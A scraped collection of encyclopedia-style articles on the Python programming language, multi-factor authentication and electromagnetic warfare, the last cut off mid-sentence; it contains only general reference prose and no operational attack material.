community bestowed upon him to reflect his long-term commitment as the project's chief decision-maker 44 (he's since come out of retirement and is self-titled "BDFL-emeritus"). In January 2019, active Python core developers elected a five-member Steering Council to lead the project. 45 46 Python 2.0 was released on 16 October 2000, with many major new features such as list comprehensions, cycle-detecting garbage collection, reference counting, and Unicode support. 47 Python 3.0 was released on 3 December 2008, with many of its major features backported to Python 2.6.x 48 and 2.7.x. Releases of Python 3 include the 2to3 utility, which automates the translation of Python 2 code to Python 3. 49 Python 2.7's end-of-life was initially set for 2015, then postponed to 2020 out of concern that a large body of existing code could not easily be forward-ported to Python 3. 50 51 No further security patches or other improvements will be released for it. 52 53 Currently only 3.8 and later are supported (2023 security issues were fixed in e.g. 3.7.17, the final 3.7.x release 54 ). While Python 2.7 and older is officially unsupported, a different unofficial Python implementation, PyPy, continues to support Python 2, i.e. "2.7.18 (plus 3.9 and 3.10), with the plus meaning (at least some) "backported security updates". 55 In 2021 (and again twice in 2022), security updates were expedited, since all Python versions were insecure (including 2.7 56 ) because of security issues leading to possible remote code execution 57 and web-cache poisoning. 58 In 2022, Python 3.10.4 and 3.9.12 were expedited 59 and 3.8.13, because of many security issues. 60 When Python 3.9.13 was released in May 2022, it was announced that the 3.9 series (joining the older series 3.8 and 3.7) would only receive security fixes in the future. 61 On 7 September 2022, four new releases were made due to a potential denial-of-service attack: 3.10.7, 3.9.14, 3.8.14, and 3.7.14. 62 63 Every Python release since 3.5 has added some syntax to the language. 3.10 added the union type operator 64 and the match and case keywords (for structural pattern matching statements). 3.11 expanded exception handling functionality. Python 3.12 added the new keyword type. Notable changes in 3.11 from 3.10 include increased program execution speed and improved error reporting. 65 Python 3.11 claims to be between 10 and 60% faster than Python 3.10, and Python 3.12 adds another 5% on top of that. It also has improved error messages, and many other changes. As of April 2024, update Python 3.12 is the stable release, and 3.12 is the only version with active (as opposed to just security) support. Since 27 June 2023 update , Python 3.8 is the oldest supported version of Python (albeit in the 'security support' phase), due to Python 3.7 reaching end-of-life. 66 Python 3.13 introduced an incremental garbage collector (producing shorter pauses for collection in programs with a lot of objects); an experimental JIT compiler; 67 and removals from the C API. Some standard library modules and many deprecated classes, functions and methods, will be removed in Python 3.15 and or 3.16. 68 69 Starting with 3.13, it and later versions have 2 years of full support (up from one and a half); followed by 3 years of security support (for same total support as before). Python is a multi-paradigm programming language. Object-oriented programming and structured programming are fully supported, and many of their features support functional programming and aspect-oriented programming (including metaprogramming 70 and metaobjects). 71 Many other paradigms are supported via extensions, including design by contract 72 73 and logic programming. 74 Python uses dynamic typing and a combination of reference counting and a cycle-detecting garbage collector for memory management. 75 It uses dynamic name resolution (late binding), which binds method and variable names during program execution. Its design offers some support for functional programming in the Lisp tradition. It has filter,mapandreduce functions; list comprehensions, dictionaries, sets, and generator expressions. 76 The standard library has two modules (itertools and functools) that implement functional tools borrowed from Haskell and Standard ML. 77 Its core philosophy is summarized in the Zen of Python (PEP 20), which includes aphorisms such as: 78 However, Python features regularly violate these principles and have received criticism for adding unnecessary language bloat. 79 Responses to these criticisms are that the Zen of Python is a guideline rather than a rule. 80 The addition of some new features had been so controversial that Guido van Rossum resigned as Benevolent Dictator for Life following vitriol over the addition of the assignment expression operator in Python 3.8. 81 82 Nevertheless, rather than building all of its functionality into its core, Python was designed to be highly extensible via modules. This compact modularity has made it particularly popular as a means of adding programmable interfaces to existing applications. Van Rossum's vision of a small core language with a large standard library and easily extensible interpreter stemmed from his frustrations with ABC, which espoused the opposite approach. 41 Python claims to strive for a simpler, less-cluttered syntax and grammar while giving developers a choice in their coding methodology. In contrast to Perl's "there is more than one way to do it" motto, Python embraces a "there should be one—and preferably only one—obvious way to do it. philosophy. 78 In practice, however, Python provides many ways to achieve the same task. There are, for example, at least three ways to format a string literal, with no certainty as to which one a programmer should use. 83 Alex Martelli, a Fellow at the Python Software Foundation and Python book author, wrote: "To describe something as 'clever' is not considered a compliment in the Python culture. 84 Python's developers usually strive to avoid premature optimization and reject patches to non-critical parts of the CPython reference implementation that would offer marginal increases in speed at the cost of clarity. 85 Execution speed can be improved by moving speed-critical functions to extension modules written in languages such as C, or by using a just-in-time compiler like PyPy. It is also possible to cross-compile to other languages, but it either doesn't provide the full speed-up that might be expected, since Python is a very dynamic language, or a restricted subset of Python is compiled, and possibly semantics are slightly changed. 86 Python's developers aim for it to be fun to use. This is reflected in its name—a tribute to the British comedy group Monty Python 87 —and in occasionally playful approaches to tutorials and reference materials, such as the use of the terms "spam" and "eggs" (a reference to a Monty Python sketch) in examples, instead of the often-used "foo" and "bar". 88 89 A common neologism in the Python community is pythonic, which has a wide range of meanings related to program style. "Pythonic" code may use Python idioms well, be natural or show fluency in the language, or conform with Python's minimalist philosophy and emphasis on readability. Code that is difficult to understand or reads like a rough transcription from another programming language is called unpythonic. 90 Python is meant to be an easily readable language. Its formatting is visually uncluttered and often uses English keywords where other languages use punctuation. Unlike many other languages, it does not use curly brackets to delimit blocks, and semicolons after statements are allowed but rarely used. It has fewer syntactic exceptions and special cases than C or Pascal. 91 Python uses whitespace indentation, rather than curly brackets or keywords, to delimit blocks. An increase in indentation comes after certain statements; a decrease in indentation signifies the end of the current block. 92 Thus, the program's visual structure accurately represents its semantic structure. 93 This feature is sometimes termed the off-side rule. Some other languages use indentation this way; but in most, indentation has no semantic meaning. The recommended indent size is four spaces. 94 Python's statements include: The assignment statement ( ) binds a name as a reference to a separate, dynamically allocated object. Variables may subsequently be rebound at any time to any object. In Python, a variable name is a generic reference holder without a fixed data type; however, it always refers to some object with a type. This is called dynamic typing—in contrast to statically-typed languages, where each variable may contain only a value of a certain type. Python does not support tail call optimization or first-class continuations, and, according to Van Rossum, it never will. 97 98 However, better support for coroutine-like functionality is provided by extending Python's generators. 99 Before 2.5, generators were lazy iterators; data was passed unidirectionally out of the generator. From Python 2.5 on, it is possible to pass data back into a generator function; and from version 3.3, it can be passed through multiple stack levels. 100 Python's expressions include: In Python, a distinction between expressions and statements is rigidly enforced, in contrast to languages such as Common Lisp, Scheme, or Ruby. This leads to duplicating some functionality. For example: Statements cannot be a part of an expression—so list and other comprehensions or lambda expressions, all being expressions, cannot contain statements. A particular case is that an assignment statement such as a 1 cannot form part of the conditional expression of a conditional statement. Methods on objects are functions attached to the object's class; the syntax instance.method(argument) is, for normal methods and functions, syntactic sugar for Class.method(instance, argument). Python methods have an explicit self parameter to access instance data, in contrast to the implicit self (or this) in some other object-oriented programming languages (e.g., C , Java, Objective-C, Ruby). 109 Python also provides methods, often called dunder methods (due to their names beginning and ending with double-underscores), to allow user-defined classes to modify how they are handled by native operations including length, comparison, in arithmetic operations and type conversion. 110 Python uses duck typing and has typed objects but untyped variable names. Type constraints are not checked at compile time; rather, operations on an object may fail, signifying that it is not of a suitable type. Despite being dynamically typed, Python is strongly typed, forbidding operations that are not well-defined (for example, adding a number to a string) rather than silently attempting to make sense of them. Python allows programmers to define their own types using classes, most often used for object-oriented programming. New instances of classes are constructed by calling the class (for example, SpamClass() or EggsClass()), and the classes are instances of the metaclass type (itself an instance of itself), allowing metaprogramming and reflection. Before version 3.0, Python had two kinds of classes (both using the same syntax): old-style and new-style; 111 current Python versions only support the semantics of the new style. Python supports optional type annotations. 4 112 These annotations are not enforced by the language, but may be used by external tools such as mypy to catch errors. 113 114 Mypy also supports a Python compiler called mypyc, which leverages type annotations for optimization. 115 1.33333 Python has the usual symbols for arithmetic operators ( , , , ), the floor division operator and the modulo operation (where the remainder can be negative, e.g. 4 3 2). It also has for exponentiation, e.g. 5 3 125 and 9 0.5 3.0, and a matrix multiplication operator . 119 These operators work like in traditional math; with the same precedence rules, the operators infix ( and - can also be unary to represent positive and negative numbers respectively). The division between integers produces floating-point results. The behavior of division has changed significantly over time: 120 In Python terms, is true division (or simply division), and is floor division. before version 3.0 is classic division. 120 Rounding towards negative infinity, though different from most languages, adds consistency. For instance, it means that the equation (a b) b a b 1 is always true. It also means that the equation b (a b) a b a is valid for both positive and negative values of a. However, maintaining the validity of this equation means that while the result of a b is, as expected, in the half-open interval 0, b), where b is a positive integer, it has to lie in the interval (b, 0 when b is negative. 121 Python provides a round function for rounding a float to the nearest integer. For tie-breaking, Python 3 uses round to even: round(1.5) and round(2.5) both produce 2. 122 Versions before 3 used round-away-from-zero: round(0.5) is 1.0, round( 0.5) is 1.0. 123 Python allows Boolean expressions with multiple equality relations in a manner that is consistent with general use in mathematics. For example, the expression a b c tests whether a is less than b and b is less than c. 124 C-derived languages interpret this expression differently: in C, the expression would first evaluate a b, resulting in 0 or 1, and that result would then be compared with c. 125 Python uses arbitrary-precision arithmetic for all integer operations. The Decimal type class in the decimal module provides decimal floating-point numbers to a pre-defined arbitrary precision and several rounding modes. 126 The Fraction class in the fractions module provides arbitrary precision for rational numbers. 127 Due to Python's extensive mathematics library, and the third-party library NumPy that further extends the native capabilities, it is frequently used as a scientific scripting language to aid in problems such as numerical data processing and manipulation. 128 129 "Hello, World program: Program to calculate the factorial of a positive integer: Python's large standard library 130 provides tools suited to many tasks and is commonly cited as one of its greatest strengths. For Internet-facing applications, many standard formats and protocols such as MIME and HTTP are supported. It includes modules for creating graphical user interfaces, connecting to relational databases, generating pseudorandom numbers, arithmetic with arbitrary-precision decimals, 126 manipulating regular expressions, and unit testing. Some parts of the standard library are covered by specifications—for example, the Web Server Gateway Interface (WSGI) implementation wsgiref follows PEP 333 131 —but most are specified by their code, internal documentation, and test suites. However, because most of the standard library is cross-platform Python code, only a few modules need altering or rewriting for variant implementations. As of 17 March 2024, update the Python Package Index (PyPI), the official repository for third-party Python software, contains over 523,000 132 packages with a wide range of functionality, including: Most Python implementations (including CPython) include a read eval print loop (REPL), permitting them to function as a command line interpreter for which users enter statements sequentially and receive results immediately. Python also comes with an Integrated development environment (IDE) called IDLE, which is more beginner-oriented. Other shells, including IDLE and IPython, add further abilities such as improved auto-completion, session state retention, and syntax highlighting. As well as standard desktop integrated development environments including PyCharm, IntelliJ Idea, Visual Studio Code etc, there are web browser-based IDEs, including SageMath, for developing science- and math-related programs; PythonAnywhere, a browser-based IDE and hosting environment; and Canopy IDE, a commercial IDE emphasizing scientific computing. 133 CPython is the reference implementation of Python. It is written in C, meeting the C89 standard (Python 3.11 uses C11 134 ) with several select C99 features. CPython includes its own C extensions, but third-party extensions are not limited to older C versions—e.g. they can be implemented with C11 or C . 135 136 CPython compiles Python programs into an intermediate bytecode 137 which is then executed by its virtual machine. 138 CPython is distributed with a large standard library written in a mixture of C and native Python, and is available for many platforms, including Windows (starting with Python 3.9, the Python installer deliberately fails to install on Windows 7 and 8; 139 140 Windows XP was supported until Python 3.5) and most modern Unix-like systems, including macOS (and Apple M1 Macs, since Python 3.9.1, with experimental installer), with unofficial support for VMS. 141 Platform portability was one of its earliest priorities. 142 (During Python 1 and 2 development, even OS 2 and Solaris were supported, 143 but support has since been dropped for many platforms.) Python, since 3.7, only supports operating systems with multi-threading support. Other just-in-time Python compilers have been developed, but are now unsupported: There are several compilers transpilers to high-level object languages, with either unrestricted Python, a restricted subset of Python, or a language similar to Python as the source language: Specialized: Older projects (or not to be used with Python 3.x and latest syntax): Performance comparison of various Python implementations on a non-numerical (combinatorial) workload was presented at EuroSciPy '13. 171 Python's performance compared to other programming languages is also benchmarked by The Computer Language Benchmarks Game. 172 Python's development is conducted largely through the Python Enhancement Proposal (PEP) process, the primary mechanism for proposing major new features, collecting community input on issues, and documenting Python design decisions. 173 Python coding style is covered in PEP 8. 174 Outstanding PEPs are reviewed and commented on by the Python community and the steering council. 173 Enhancement of the language corresponds with the development of the CPython reference implementation. The mailing list python-dev is the primary forum for the language's development. Specific issues were originally discussed in the Roundup bug tracker hosted at by the foundation. 175 In 2022, all issues and discussions were migrated to GitHub. 176 Development originally took place on a self-hosted source-code repository running Mercurial, until Python moved to GitHub in January 2017. 177 CPython's public releases come in three types, distinguished by which part of the version number is incremented: Many alpha, beta, and release-candidates are also released as previews and for testing before final releases. Although there is a rough schedule for each release, they are often delayed if the code is not ready. Python's development team monitors the state of the code by running the large unit test suite during development. 183 The major academic conference on Python is PyCon. There are also special Python mentoring programs, such as PyLadies. Python 3.12 removed wstr meaning Python extensions 184 need to be modified, 185 and 3.10 added pattern matching to the language. 186 Python 3.12 dropped some outdated modules, and more will be dropped in the future, deprecated as of 3.13; already deprecated array 'u' format code will emit DeprecationWarning since 3.13 and will be removed in Python 3.16. The 'w' format code should be used instead. Part of ctypes is also deprecated and http.server.CGIHTTPRequestHandler will emit a DeprecationWarning, and will be removed in 3.15. Using that code already has a high potential for both security and functionality bugs. Parts of the typing module are deprecated, e.g. creating a typing.NamedTuple class using keyword arguments to denote the fields and such (and more) will be disallowed in Python 3.15. Tools that can generate documentation for Python API include pydoc (available as part of the standard library), Sphinx, Pdoc and its forks, Doxygen and Graphviz, among others. 187 Python's name is derived from the British comedy group Monty Python, whom Python creator Guido van Rossum enjoyed while developing the language. Monty Python references appear frequently in Python code and culture; 188 for example, the metasyntactic variables often used in Python literature are spam and eggs instead of the traditional foo and bar. 188 189 The official Python documentation also contains various references to Monty Python routines. 190 191 Users of Python are sometimes referred to as "Pythonistas". 192 The prefix Py- is used to show that something is related to Python. Examples of the use of this prefix in names of Python applications or libraries include Pygame, a binding of SDL to Python (commonly used to create games); PyQt and PyGTK, which bind Qt and GTK to Python respectively; and PyPy, a Python implementation originally written in Python. Since 2003, Python has consistently ranked in the top ten most popular programming languages in the TIOBE Programming Community Index where as of December 2022 update it was the most popular language (ahead of C, C , and Java). 39 It was selected as Programming Language of the Year (for "the highest rise in ratings in a year") in 2007, 2010, 2018, and 2020 (the only language to have done so four times as of 2020 update 193 ). Large organizations that use Python include Wikipedia, Google, 194 Yahoo , 195 CERN, 196 NASA, 197 Facebook, 198 Amazon, Instagram, 199 Spotify, 200 and some smaller entities like ILM 201 and ITA. 202 The social news networking site Reddit was written mostly in Python. 203 Python can serve as a scripting language for web applications, e.g. via mod wsgi for the Apache webserver. 204 With Web Server Gateway Interface, a standard API has evolved to facilitate these applications. Web frameworks like Django, Pylons, Pyramid, TurboGears, web2py, Tornado, Flask, Bottle, and Zope support developers in the design and maintenance of complex applications. Pyjs and IronPython can be used to develop the client-side of Ajax-based applications. SQLAlchemy can be used as a data mapper to a relational database. Twisted is a framework to program communications between computers, and is used (for example) by Dropbox. Libraries such as NumPy, SciPy and Matplotlib allow the effective use of Python in scientific computing, 205 206 with specialized libraries such as Biopython and Astropy providing domain-specific functionality. SageMath is a computer algebra system with a notebook interface programmable in Python: its library covers many aspects of mathematics, including algebra, combinatorics, numerical mathematics, number theory, and calculus. 207 OpenCV has Python bindings with a rich set of features for computer vision and image processing. 208 Python is commonly used in artificial intelligence projects and machine learning projects with the help of libraries like TensorFlow, Keras, Pytorch, scikit-learn and the Logic language ProbLog. 209 210 211 212 213 As a scripting language with a modular architecture, simple syntax, and rich text processing tools, Python is often used for natural language processing. 214 The combination of Python and Prolog has proved to be particularly useful for AI applications, with Prolog providing knowledge representation and reasoning capabilities. The Janus system, in particular, exploits the similarities between these two languages, in part because of their use of dynamic typing, and the simple recursive nature of their data structures. Typical applications of this combination include natural language processing, visual query answering, geospatial reasoning, and handling of semantic web data. 215 216 The Natlog system, implemented in Python, uses Definite Clause Grammars (DCGs) as prompt generators for text-to-text generators like GPT3 and text-to-image generators like DALL-E or Stable Diffusion. 217 Python can also be used for graphical user interface (GUI) by using libraries like Tkinter. 218 219 Python has been successfully embedded in many software products as a scripting language, including in finite element method software such as Abaqus, 3D parametric modelers like FreeCAD, 3D animation packages such as 3ds Max, Blender, Cinema 4D, Lightwave, Houdini, Maya, modo, MotionBuilder, Softimage, the visual effects compositor Nuke, 2D imaging programs like GIMP, 220 Inkscape, Scribus and Paint Shop Pro, 221 and musical notation programs like scorewriter and capella. GNU Debugger uses Python as a pretty printer to show complex structures such as C containers. Esri promotes Python as the best choice for writing scripts in ArcGIS. 222 It has also been used in several video games, 223 224 and has been adopted as first of the three available programming languages in Google App Engine, the other two being Java and Go. 225 Many operating systems include Python as a standard component. It ships with most Linux distributions, 226 AmigaOS 4 (using Python 2.7), FreeBSD (as a package), NetBSD, and OpenBSD (as a package) and can be used from the command line (terminal). Many Linux distributions use installers written in Python: Ubuntu uses the Ubiquity installer, while Red Hat Linux and Fedora Linux use the Anaconda installer. Gentoo Linux uses Python in its package management system, Portage. Python is used extensively in the information security industry, including in exploit development. 227 228 Most of the Sugar software for the One Laptop per Child XO, developed at Sugar Labs as of 2008 update , is written in Python. 229 The Raspberry Pi single-board computer project has adopted Python as its main user-programming language. LibreOffice includes Python and intends to replace Java with Python. Its Python Scripting Provider is a core feature 230 since Version 4.0 from 7 February 2013. Python's design and philosophy have influenced many other programming languages: Python's development practices have also been emulated by other languages. For example, the practice of requiring a document describing the rationale for, and issues surrounding, a change to the language (in Python, a PEP) is also used in Tcl, 243 Erlang, 244 and Swift. 245 |
667 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Multi-factor_authentication | Multi-factor authentication (MFA; two-factor authentication, or 2FA, along with similar terms) is an electronic authentication method in which a user is granted access to a website or application only after successfully presenting two or more pieces of evidence (or factors) to an authentication mechanism. MFA protects personal data—which may include personal identification or financial assets—from being accessed by an unauthorized third party that may have been able to discover, for example, a single password. Usage of MFA has increased in recent years, however, there are numerous threats that consistently makes it hard to ensure MFA is entirely secure. 1 Authentication takes place when someone tries to log into a computer resource (such as a computer network, device, or application). The resource requires the user to supply the identity by which the user is known to the resource, along with evidence of the authenticity of the user's claim to that identity. Simple authentication requires only one such piece of evidence (factor), typically a password. For additional security, the resource may require more than one factor—multi-factor authentication, or two-factor authentication in cases where exactly two pieces of evidence are to be supplied. 2 The use of multiple authentication factors to prove one's identity is based on the premise that an unauthorized actor is unlikely to be able to supply the factors required for access. If, in an authentication attempt, at least one of the components is missing or supplied incorrectly, the user's identity is not established with sufficient certainty and access to the asset (e.g., a building, or data) being protected by multi-factor authentication then remains blocked. The authentication factors of a multi-factor authentication scheme may include: 3 An example of two-factor authentication is the withdrawing of money from an ATM; only the correct combination of a bank card (something the user possesses) and a PIN (something the user knows) allows the transaction to be carried out. Two other examples are to supplement a user-controlled password with a one-time password (OTP) or code generated or received by an authenticator (e.g. a security token or smartphone) that only the user possesses. 4 A third-party authenticator app enables two-factor authentication in a different way, usually by showing a randomly generated and constantly refreshing code which the user can use, rather than sending an SMS or using another method. 5 Knowledge factors are a form of authentication. In this form, the user is required to prove knowledge of a secret in order to authenticate. A password is a secret word or string of characters that is used for user authentication. This is the most commonly used mechanism of authentication. 3 Many multi-factor authentication techniques rely on passwords as one factor of authentication. Variations include both longer ones formed from multiple words (a passphrase) and the shorter, purely numeric, PIN commonly used for ATM access. Traditionally, passwords are expected to be memorized, but can also be written down on a hidden paper or text file. Possession factors ("something only the user has") have been used for authentication for centuries, in the form of a key to a lock. The basic principle is that the key embodies a secret that is shared between the lock and the key, and the same principle underlies possession factor authentication in computer systems. A security token is an example of a possession factor. Disconnected tokens have no connections to the client computer. They typically use a built-in screen to display the generated authentication data, which is manually typed in by the user. This type of token mostly uses a OTP that can only be used for that specific session. 6 Connected tokens are devices that are physically connected to the computer to be used. Those devices transmit data automatically. 7 There are a number of different types, including USB tokens, smart cards and wireless tags. 7 Increasingly, FIDO2 capable tokens, supported by the FIDO Alliance and the World Wide Web Consortium (W3C), have become popular with mainstream browser support beginning in 2015. A software token (a.k.a. soft token) is a type of two-factor authentication security device that may be used to authorize the use of computer services. Software tokens are stored on a general-purpose electronic device such as a desktop computer, laptop, PDA, or mobile phone and can be duplicated. (Contrast hardware tokens, where the credentials are stored on a dedicated hardware device and therefore cannot be duplicated, absent physical invasion of the device). A soft token may not be a device the user interacts with. Typically an X.509v3 certificate is loaded onto the device and stored securely to serve this purpose. citation needed Multi-factor authentication can also be applied in physical security systems. These physical security systems are known and commonly referred to as access control. Multi-factor authentication is typically deployed in access control systems through the use, firstly, of a physical possession (such as a fob, keycard, or QR-code displayed on a device) which acts as the identification credential, and secondly, a validation of one's identity such as facial biometrics or retinal scan. This form of multi-factor authentication is commonly referred to as facial verification or facial authentication. These are factors associated with the user, and are usually biometric methods, including fingerprint, face, 8 voice, or iris recognition. Behavioral biometrics such as keystroke dynamics can also be used. Increasingly, a fourth factor is coming into play involving the physical location of the user. While hard wired to the corporate network, a user could be allowed to login using only a pin code. Whereas if the user was off the network, entering a code from a soft token as well could be required. This could be seen as an acceptable standard where access into the office is controlled. citation needed Systems for network admission control work in similar ways where the level of network access can be contingent on the specific network a device is connected to, such as Wi-Fi vs wired connectivity. This also allows a user to move between offices and dynamically receive the same level of network access clarification needed in each. citation needed Two-factor authentication over text message was developed as early as 1996, when AT T described a system for authorizing transactions based on an exchange of codes over two-way pagers. 9 10 Many multi-factor authentication vendors offer mobile phone-based authentication. Some methods include push-based authentication, QR code-based authentication, one-time password authentication (event-based and time-based), and SMS-based verification. SMS-based verification suffers from some security concerns. Phones can be cloned, apps can run on several phones and cell-phone maintenance personnel can read SMS texts. Not least, cell phones can be compromised in general, meaning the phone is no longer something only the user has. The major drawback of authentication including something the user possesses is that the user must carry around the physical token (the USB stick, the bank card, the key or similar), practically at all times. Loss and theft are risks. Many organizations forbid carrying USB and electronic devices in or out of premises owing to malware and data theft risks, and most important machines do not have USB ports for the same reason. Physical tokens usually do not scale, typically requiring a new token for each new account and system. Procuring and subsequently replacing tokens of this kind involves costs. In addition, there are inherent conflicts and unavoidable trade-offs between usability and security. 11 Two-step authentication involving mobile phones and smartphones provides an alternative to dedicated physical devices. To authenticate, people can use their personal access codes to the device (i.e. something that only the individual user knows) plus a one-time-valid, dynamic passcode, typically consisting of 4 to 6 digits. The passcode can be sent to their mobile device 2 by SMS or can be generated by a one-time passcode-generator app. In both cases, the advantage of using a mobile phone is that there is no need for an additional dedicated token, as users tend to carry their mobile devices around at all times. Notwithstanding the popularity of SMS verification, security advocates have publicly criticized SMS verification, 12 and in July 2016, a United States NIST draft guideline proposed deprecating it as a form of authentication. 13 A year later NIST reinstated SMS verification as a valid authentication channel in the finalized guideline. 14 In 2016 and 2017 respectively, both Google and Apple started offering user two-step authentication with push notifications 3 as an alternative method. 15 16 Security of mobile-delivered security tokens fully depends on the mobile operator's operational security and can be easily breached by wiretapping or SIM cloning by national security agencies. 17 Advantages: Disadvantages: The Payment Card Industry (PCI) Data Security Standard, requirement 8.3, requires the use of MFA for all remote network access that originates from outside the network to a Card Data Environment (CDE). 21 Beginning with PCI-DSS version 3.2, the use of MFA is required for all administrative access to the CDE, even if the user is within a trusted network. The second Payment Services Directive requires "strong customer authentication" on most electronic payments in the European Economic Area since September 14, 2019. 22 In India, the Reserve Bank of India mandated two-factor authentication for all online transactions made using a debit or credit card using either a password or a one-time password sent over SMS. This requirement was removed in 2016 for transactions up to 2,000 after opting-in with the issuing bank. 23 Vendors such as Uber have been mandated by the bank to amend their payment processing systems in compliance with this two-factor authentication rollout. 24 25 26 Details for authentication for federal employees and contractors in the U.S. are defined in Homeland Security Presidential Directive 12 (HSPD 12). 27 IT regulatory standards for access to federal government systems require the use of multi-factor authentication to access sensitive IT resources, for example when logging on to network devices to perform administrative tasks 28 and when accessing any computer using a privileged login. 29 NIST Special Publication 800 63 3 discusses various forms of two-factor authentication and provides guidance on using them in business processes requiring different levels of assurance. 30 In 2005, the United States' Federal Financial Institutions Examination Council issued guidance for financial institutions recommending financial institutions conduct risk-based assessments, evaluate customer awareness programs, and develop security measures to reliably authenticate customers remotely accessing online financial services, officially recommending the use of authentication methods that depend on more than one factor (specifically, what a user knows, has, and is) to determine the user's identity. 31 In response to the publication, numerous authentication vendors began improperly promoting challenge-questions, secret images, and other knowledge-based methods as "multi-factor" authentication. Due to the resulting confusion and widespread adoption of such methods, on August 15, 2006, the FFIEC published supplemental guidelines—which state that by definition, a "true" multi-factor authentication system must use distinct instances of the three factors of authentication it had defined, and not just use multiple instances of a single factor. 32 According to proponents, multi-factor authentication could drastically reduce the incidence of online identity theft and other online fraud, because the victim's password would no longer be enough to give a thief permanent access to their information. However, many multi-factor authentication approaches remain vulnerable to phishing, 33 man-in-the-browser, and man-in-the-middle attacks. 34 Two-factor authentication in web applications are especially susceptible to phishing attacks, particularly in SMS and e-mails, and, as a response, many experts advise users not to share their verification codes with anyone, 35 and many web application providers will place an advisory in an e-mail or SMS containing a code. 36 Multi-factor authentication may be ineffective 37 against modern threats, like ATM skimming, phishing, and malware. 38 In May 2017, O2 Telef nica, a German mobile service provider, confirmed that cybercriminals had exploited SS7 vulnerabilities to bypass SMS based two-step authentication to do unauthorized withdrawals from users' bank accounts. The criminals first infected the account holder's computers in an attempt to steal their bank account credentials and phone numbers. Then the attackers purchased access to a fake telecom provider and set up a redirect for the victim's phone number to a handset controlled by them. Finally, the attackers logged into victims' online bank accounts and requested for the money on the accounts to be withdrawn to accounts owned by the criminals. SMS passcodes were routed to phone numbers controlled by the attackers and the criminals transferred the money out. 39 An increasingly common approach to defeating MFA is to bombard the user with many requests to accept a log-in, until the user eventually succumbs to the volume of requests and accepts one. 40 Many multi-factor authentication products require users to deploy client software to make multi-factor authentication systems work. Some vendors have created separate installation packages for network login, Web access credentials, and VPN connection credentials. For such products, there may be four or five different software packages to push down to the client PC in order to make use of the token or smart card. This translates to four or five packages on which version control has to be performed, and four or five packages to check for conflicts with business applications. If access can be operated using web pages, it is possible to limit the overheads outlined above to a single application. With other multi-factor authentication technology such as hardware token products, no software must be installed by end-users. citation needed There are drawbacks to multi-factor authentication that are keeping many approaches from becoming widespread. Some users have difficulty keeping track of a hardware token or USB plug. Many users do not have the technical skills needed to install a client-side software certificate by themselves. Generally, multi-factor solutions require additional investment for implementation and costs for maintenance. Most hardware token-based systems are proprietary, and some vendors charge an annual fee per user. Deployment of hardware tokens is logistically challenging. Hardware tokens may get damaged or lost, and issuance of tokens in large industries such as banking or even within large enterprises needs to be managed. In addition to deployment costs, multi-factor authentication often carries significant additional support costs. citation needed A 2008 survey 41 of over 120 U.S. credit unions by the Credit Union Journal reported on the support costs associated with two-factor authentication. In their report, software certificates and software toolbar approaches clarification needed were reported to have the highest support costs. Research into deployments of multi-factor authentication schemes 42 has shown that one of the elements that tend to impact the adoption of such systems is the line of business of the organization that deploys the multi-factor authentication system. Examples cited include the U.S. government, which employs an elaborate system of physical tokens (which themselves are backed by robust Public Key Infrastructure), as well as private banks, which tend to prefer multi-factor authentication schemes for their customers that involve more accessible, less expensive means of identity verification, such as an app installed onto a customer-owned smartphone. Despite the variations that exist among available systems that organizations may have to choose from, once a multi-factor authentication system is deployed within an organization, it tends to remain in place, as users invariably acclimate to the presence and use of the system and embrace it over time as a normalized element of their daily process of interaction with their relevant information system. While the perception is that multi-factor authentication is within the realm of perfect security, Roger Grimes writes 43 that if not properly implemented and configured, multi-factor authentication can in fact be easily defeated. In 2013, Kim Dotcom claimed to have invented two-factor authentication in a 2000 patent, 44 and briefly threatened to sue all the major web services. However, the European Patent Office revoked his patent 45 in light of an earlier 1998 U.S. patent held by AT T. 46 |
668 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Electromagnetic_warfare | Electromagnetic warfare or electronic warfare 1 (EW) is warfare involving the use of the electromagnetic spectrum (EM spectrum) or directed energy to control the spectrum, attack an enemy, or impede enemy operations. The purpose of electromagnetic warfare is to deny the opponent the advantage of—and ensure friendly unimpeded access to—the EM spectrum. Electromagnetic warfare can be applied from air, sea, land, or space by crewed and uncrewed systems, and can target communication, radar, or other military and civilian assets. 2 3 Military operations are executed in an information environment increasingly complicated by the electromagnetic spectrum. The electromagnetic spectrum portion of the information environment is referred to as the electromagnetic environment (EME). The recognized need for military forces to have unimpeded access to and use of the electromagnetic environment creates vulnerabilities and opportunities for electronic warfare in support of military operations. 2 Within the information operations construct, EW is an element of information warfare; more specifically, it is an element of offensive and defensive counterinformation. 4 NATO has a different and arguably citation needed more encompassing and comprehensive approach to EW. 5 A military committee conceptual document from 2007, MCM 0142 Nov 2007 Military Committee Transformation Concept for Future NATO Electronic Warfare, citation needed recognised the EME as an operational maneuver space and warfighting environment domain. In NATO, EW is considered to be warfare in the EME. NATO has adopted simplified language which parallels those used in other warfighting environments like maritime, land, and air space. For example, an electronic attack (EA) is offensive use of EM energy, electronic defense (ED), and electronic surveillance (ES). The use of the traditional NATO EW terms, electronic countermeasures (ECM), electronic protective measures (EPM), and electronic support measures (ESM) has been retained as they contribute to and support electronic attack (EA), electronic defense (ED) and electronic surveillance (ES). Besides EW, other EM operations include intelligence, surveillance, target acquisition and reconnaissance (ISTAR), and signals intelligence (SIGINT). Subsequently, NATO has issued EW policy and doctrine and is addressing the other NATO defense lines of development. Primary EW activities have been developed over time to exploit the opportunities and vulnerabilities that are inherent in the physics of EM energy. Activities used in EW include electro-optical, infrared and radio frequency countermeasures; EM compatibility and deception; radio jamming, radar jamming and deception and electronic counter-countermeasures (or anti-jamming); electronic masking, probing, reconnaissance, and intelligence; electronic security; EW reprogramming; emission control; spectrum management; and wartime reserve modes. 2 4 Electronic warfare consists of three major subdivisions: electronic attack (EA), electronic protection (EP), and electronic warfare support (ES). 2 6 Electronic attack (EA), also known as electronic countermeasures (ECM), involves the offensive use of electromagnetic energy weapons, directed energy weapons, or anti-radiation weapons to attack personnel, facilities, or equipment with the intent of degrading, neutralizing, or destroying enemy combat capability including human life. In the case of electromagnetic energy, this action is most commonly referred to as "jamming" and can be performed on communications systems or radar systems. In the case of anti-radiation weapons, this often includes missiles or bombs that can home in on a specific signal (radio or radar) and follow that path directly to impact, thus destroying the system broadcasting. In November 2021, Israel Aerospace Industries announced a new electronic warfare system named Scorpius that can disrupt radar and communications from ships, UAVs, and missiles simultaneously and at varying distances. 7 Electronic protection (EP), also known as an electronic protective measure (EPM) or electronic counter-countermeasure 